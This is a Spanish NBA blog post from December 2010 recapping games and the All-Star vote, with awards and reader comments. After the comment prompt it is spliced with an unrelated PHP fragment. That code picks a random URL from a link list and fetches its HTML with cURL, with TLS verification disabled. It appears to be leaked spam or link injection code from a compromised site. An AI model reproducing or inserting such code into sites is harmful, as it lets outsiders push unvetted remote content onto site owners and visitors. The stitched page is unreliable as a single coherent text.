La Crónica (30/12/2010)

31 de December de 2010 por txusma

Noche de jueves, noche de partidazos a pesar de las ausencias. Los Spurs se merendaron a domicilio, 99-93, a unos Mavs que contaron con la baja del alemán Dirk Nowitzki. En todo caso no fue una merendola relajada sinó que tuvieran que apretar los dientes para sobreponerse al triple-doble de Jason Kidd y los 30 puntos de Caron Butler, que se pareció a aquel jugador que formaba parte del Big Three de los Wizards de hace unas temporadas. Con esta victoria San Antonio está ya en 28, líder en solitario de la NBA.

Otro que se perdió el partido de ayer fue Brandon Roy que estará de baja por tiempo indefinido debido a sus continuos problemas en las rodillas. Una auténtica pena para él, para los Blazers y para todos los buenos aficionados al baloncesto. Su baja otorga más protagonismo a jugadores como Wesley Matheews o Rudy Fernandes. Anoche fue el primero el que lideró al equipo a la victoria frente los Jazz (89-100). Marcus Camby, con 20 rebotes también contribuyó definitivamente. Lamarcus estuvo bien en el aspecto anotador pero sólo cogió 3 tristes rebotes.

Y ojito que el “experimento” de Orlando funciona. Van 6 victorias consecutivas, 3 de ellas contra equipos de la talla de Spurs, Celtics y ayer mismo, Knicks (112-103). Turkoglu ha vuelto, Arenas aporta desde el banco, Richardon va mejorando poco a poco, Howard se encuentra más cómodo y hasta JJ Redick parece haber despertado. Vuelven a sonreir los de Florida.

Para acabar, anoche se publicaron los resultados parciales de las votaciones del All-Stars con pocas sorpresas. En el Este los titulares son Rondo, Wade, Lebron, Garnett y Howard y en el Oeste, Paul, Bryant, Melo, Durant y… Yao Ming. La posición de pívot en el Oeste es un auténtico solar porque detrás del chino aparecen Bynum y Haywood (¡oh, dios mio!). Y Love y Gasol pegándose con los aleros donde hay sobrepoblación.

PREMIOS

MVP: Se confirma que Brandon Roy estará de baja durante un tiempo indefinido. Si los Blazers quieren continuar aspirando a algo necesitarán lo mejor de jugadores como Wesley Matthews, autor de 30 puntos, 3 rebotes, 3 asistencias y 4 robos en el partido de anoche. Dwight Howard fue otro de los destacados con 24 puntos y 18 rebotes.

Rookie: Gary Neal sólo sabe hacer una cosa, anotar, y lo hace bastante bien como demuestran los 21 puntos que anotó ayer. Por su parte, Gordon Hayward aprovechó de nuevo la ausencia de Kirilenko con 11 puntos y 4 rebotes.

Sorpresa: Por si alguien le había perdido la pista, Shawne Williams está jugando en los Knicks y empieza  disfrutar de minutos y a mostrar su calidad. Anoche fueron 15 puntos en 22 minutos de juego.

Decepción: Dos partidos malos seguidos para Landry Fields. ¿Rookie Wall?

Esfuerzo en vano: La pareja Chandler-Stoudamire lo dio todo frente los Magic pero no pudieron alzarse con la victoria. Entre los 2 anotaron 59 puntos. Y Jason Kidd consiguió su enésimo triple-doble pero no logró que los Mavs se sobrepusieran a la baja de Nowitzki.

¡FELIZ año 2011!

Comenta

6 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Alucino con G.Neals 21 puntacos con el ritmo de juego de san antonio.

    Yo creo que por muy bien que lo hagan Richardson, Arenas y Turkoglu, el que falla en momentos transcendentales del partido es Howard, lo veo todavia muy blandito, cuando hay riesgo o jugadas importantes n se la huega él o lo hace mal.

      Citar

  2. Jona dice:
    #2

    Feliz año tios y espero que el año que viene seamos más y más que entre gente nueva a leer el trabajo que haceis , y que posteen un poco al menos , como yo hago XD

    Me quedo con ese último partido de las finales con todos aqui en vilo jaja fue tremendo

    Gracias y FELIZ AÑO

      Citar

  3. nacho dice:
    #3

    Pregunta:
    ¿Qué queremos para el rookie del año, un animal que destroza el aro, o un tío que día sí y día también aporta para su equipo desde el banco (al loro con las victorias)?
    A Blake Griffin no le he visto ningún partido, pero con Gary Neal flipo, creo que con G. Hill está demostrando ser el mejor banquillo de lo que llevamos de temporada.

      Citar

  4. Txusma dice:
    #4

    Yo me quedo con el animal que destroza el aro más que nada pq no es lo único q sabe hacer. 12 rebotes y 3’1 asistencias por partido lo atestiguan.
    Ya me gustaría ver a Neal jugando de titular y disputando todos sus minutos contra los teóricos titulares del otro equipo. No es lo mismo.

      Citar

  5. Denise dice:
    #5

    Gary Neal está haciendo un temporadón. Con lo pufo que era en el Barça, y ahora está demostrando ser un buen jugador saliendo desde el banquillo; una de las claves por la cual los Spurs estan siendo la sorpresa de la NBA (no creo que mucha gente apostara en Regular sEason por ellos), pero de ahí a compararlo con Griffin…., Blake Griffin va a ser la referencia en la pintura junto con Howard en la próxima década.
    Feliz Año!

      Citar

  6. max dice:
    #6

    A Gary Neal en el Barça se le intuia calidad, pero caer en manos de un entrenador como Ivanovic creo que lo desquició un poco. Ivanovic te hace un crack o te hunde en la miseria, y a Neal le pasó un poco lo segundo.
    Feliz año!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>